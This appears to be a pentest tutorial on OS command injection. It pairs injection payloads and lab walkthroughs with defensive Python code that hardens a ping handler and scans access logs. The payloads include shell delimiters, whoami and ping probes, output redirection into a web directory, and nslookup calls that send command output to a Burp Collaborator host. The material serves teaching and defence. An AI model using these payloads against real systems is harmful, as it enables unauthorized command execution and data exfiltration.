💎Command Injection
CMD injection Nuclei template payload:
%26ls||id%26
https://vulnerable-website/endpoint?parameter=%26ls||id%26

How to Detect and Exploit Them?
Imagine you are testing the parameters of the following URL during a pentest:
https://vulnerable-website/endpoint?parameter=123
To detect whether the source code protects against command injection, we can try a couple of methods:
Insert special characters to detect delimiters:
We can inject some special characters to see whether the application blocks any of the characters that could be used for command injection:
&
;
Newline (0x0a or \n)
&&
|
||
If the application doesn't throw any error messages, we can try injecting our command after one of these delimiters:
https://vulnerable-website/endpoint?parameter=1|whoami
----------------------------------------------------------------
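To show why the delimiters above matter, here is an added example (not code from the page) of a back-end handler in its vulnerable and hardened forms. The hypothetical endpoint takes a host parameter and pings it. The vulnerable form builds one command string for a shell, so every delimiter in the list above is interpreted by the shell; the hardened form validates the value as an IP address or hostname (an allowlist, which also covers the encoded variants such as %26 that a delimiter denylist would miss) and passes it to subprocess as a single argv element with no shell involved. The function and parameter names are assumptions for illustration; the vulnerable command line is only rendered, never executed.

```python
import ipaddress
import re
import subprocess
from typing import List

# The delimiters listed above, kept here for the detection helper only.
SHELL_DELIMITERS = ("&&", "||", "&", ";", "|", "\n")


def vulnerable_command_line(parameter: str) -> str:
    """Render the string a shell=True call would hand to /bin/sh.

    This is the vulnerable construction: the parameter is spliced into the
    command text, so '1|whoami' becomes a pipeline of two commands.
    The string is returned for inspection and is never executed here.
    """
    return f"ping -c 1 {parameter}"


# RFC 1123-style hostname: labels of letters, digits and hyphens, 253 chars max.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_valid_host(value: str) -> bool:
    """Allowlist check: the value must be an IP address or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME.match(value))


def contains_delimiter(value: str) -> bool:
    """Denylist check using the page's delimiter list (weaker than the allowlist,
    useful as a logging/alerting signal rather than as the only control)."""
    return any(d in value for d in SHELL_DELIMITERS)


def safe_argv(parameter: str) -> List[str]:
    """Hardened construction: validate, then build an argv list.

    Each list element reaches the ping binary as one argument; no shell parses
    the text, so '|', ';', '&' and newlines have no special meaning.
    """
    if not is_valid_host(parameter):
        raise ValueError("parameter is not a hostname or IP address")
    return ["ping", "-c", "1", parameter]


def run_ping(parameter: str) -> subprocess.CompletedProcess:
    """Execute the hardened form (shell=False) with a timeout."""
    return subprocess.run(
        safe_argv(parameter), shell=False, capture_output=True, text=True, timeout=10
    )


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "1|whoami", "x||ping -c 10 127.0.0.1||"):
        print(repr(candidate), "-> shell would see:", vulnerable_command_line(candidate))
        try:
            print("   hardened argv:", safe_argv(candidate))
        except ValueError as exc:
            print("   hardened handler rejects it:", exc)
```

The time-delay payload from the next section is rejected by the same allowlist: after URL decoding it contains spaces and pipes, neither of which a hostname may contain.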
Detecting blind OS command injection:
Time delays
Most OS command injections are blind: the output of the executed command is not returned in the response. After identifying which special characters are allowed, we can confirm the injection using a time delay, as below:
https://vulnerable-website/endpoint?parameter=x||ping+-c+10+127.0.0.1||
----------------------------------------------------------------
Redirecting output
You can also redirect the output of the command to a file and then retrieve that file through your browser. A payload similar to the following can be used:
https://vulnerable-website/endpoint?parameter=||whoami>/var/www/images/output.txt||
----------------------------------------------------------------
OOB (Out Of Band) Exploitation
You can also trigger an OOB network interaction with an external server such as Burp Collaborator. A payload similar to the following can be used:
https://vulnerable-website/endpoint?parameter=x||nslookup+burp.collaborator.address||
Or you can exfiltrate the output of your command using a payload similar to the following:
https://vulnerable-website/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||
The most common parameters to consider while testing for command injection are listed below:
cmd
exec
command
execute
ping
query
jump
code
reg
do
func
arg
option
load
process
step
read
function
req
feature
exe
module
payload
run
print
----------------------------------------------------------------
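From the defender's side, the delimiter list and the parameter list above translate directly into a detection rule over web server logs. The following is an added example, not code from the page: it parses common-format access log lines, URL-decodes each query parameter (so the %26 and + encodings used in the payloads above are seen as the characters they stand for), flags any value containing one of the listed delimiters, and records whether the parameter name is one of the commonly abused names listed above. The log lines are constructed for the example; the log format regex covers the common/combined format only.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Parameter names from the list above, used to enrich findings.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code", "reg",
    "do", "func", "arg", "option", "load", "process", "step", "read", "function",
    "req", "feature", "exe", "module", "payload", "run", "print",
}

# Delimiters from the list above; two-character forms first so they are reported as such.
DELIMITERS = ("&&", "||", "&", ";", "|", "\n")

# Apache/nginx common log format (assumed format for the constructed sample).
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def inspect_query(target: str) -> List[Dict[str, object]]:
    """Return one finding per query parameter whose decoded value holds a delimiter.

    The query is split on '&' by hand rather than with parse_qsl, so that ';'
    (a shell delimiter, and a query separator in older Python versions) stays
    inside the value where it can be detected.
    """
    findings: List[Dict[str, object]] = []
    query = urlsplit(target).query
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw_value = pair.partition("=")
        value = unquote_plus(raw_value)
        hits = [d for d in DELIMITERS if d in value]
        if hits:
            findings.append({
                "parameter": unquote_plus(name),
                "value": value,
                "delimiters": hits,
                "known_name": unquote_plus(name).lower() in SUSPECT_PARAMS,
            })
    return findings


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Run inspect_query over every parseable log line and tag findings with source data."""
    alerts: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = ACCESS_LINE.match(line)
        if not match:
            continue
        for finding in inspect_query(match["target"]):
            finding.update(ip=match["ip"], time=match["time"], status=match["status"])
            alerts.append(finding)
    return alerts


# Constructed sample: a benign request, three probes using payloads from this page, a benign search.
LOG_SAMPLE = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /endpoint?parameter=123 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /endpoint?parameter=1|whoami HTTP/1.1" 200 611
203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /endpoint?parameter=%26ls||id%26 HTTP/1.1" 500 0
203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /endpoint?parameter=x||ping+-c+10+127.0.0.1|| HTTP/1.1" 200 512
198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /search?query=blue+shoes HTTP/1.1" 200 3044
"""

if __name__ == "__main__":
    for alert in scan_access_log(LOG_SAMPLE):
        print(alert)
```

Three of the five sample lines are flagged; the benign search on a parameter named query is not, because the enrichment on parameter names never triggers on its own. A status of 500 next to a delimiter hit (the third sample line) is worth correlating with server error logs, since the page notes that error messages are one of the first signals a tester looks for.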
OS command injection, simple case
Use Burp Suite to intercept and modify a request that calls the query function.
Modify each parameter in the request body one by one, giving it the value 1|whoami.
Observe that the response contains the name of the current user.
-------------------------------------------------------------
Blind OS command injection with time delays
Use Burp Suite to intercept and modify a request that calls the query function.
Modify each parameter one by one, for example the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||
Observe that the response takes 10 seconds to return.
-------------------------------------------------------------
Blind OS command injection with output redirection
Use Burp Suite to intercept and modify a request that calls the query function.
Modify each parameter one by one, for example the email parameter, changing it to: email=||whoami>/var/www/images/output.txt||
Now use Burp Suite to intercept and modify the request that loads an image of a product.
Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:
filename=output.txt
Observe that the response contains the output from the injected command.
-------------------------------------------------------------
Blind OS command injection with out-of-band interaction
Use Burp Suite to intercept and modify a request that calls the query function.
Modify each parameter one by one, for example the email parameter, changing it to: email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.
-------------------------------------------------------------
Blind OS command injection with out-of-band data exfiltration
Use Burp Suite to intercept and modify a request that calls the query function.
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard.
Modify each parameter one by one, for example the email parameter, changing it to: email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
Go back to the Collaborator tab, and click "Poll now". You should see some DNS interactions that were initiated by the application as a result of your payload.
-------------------------------------------------------------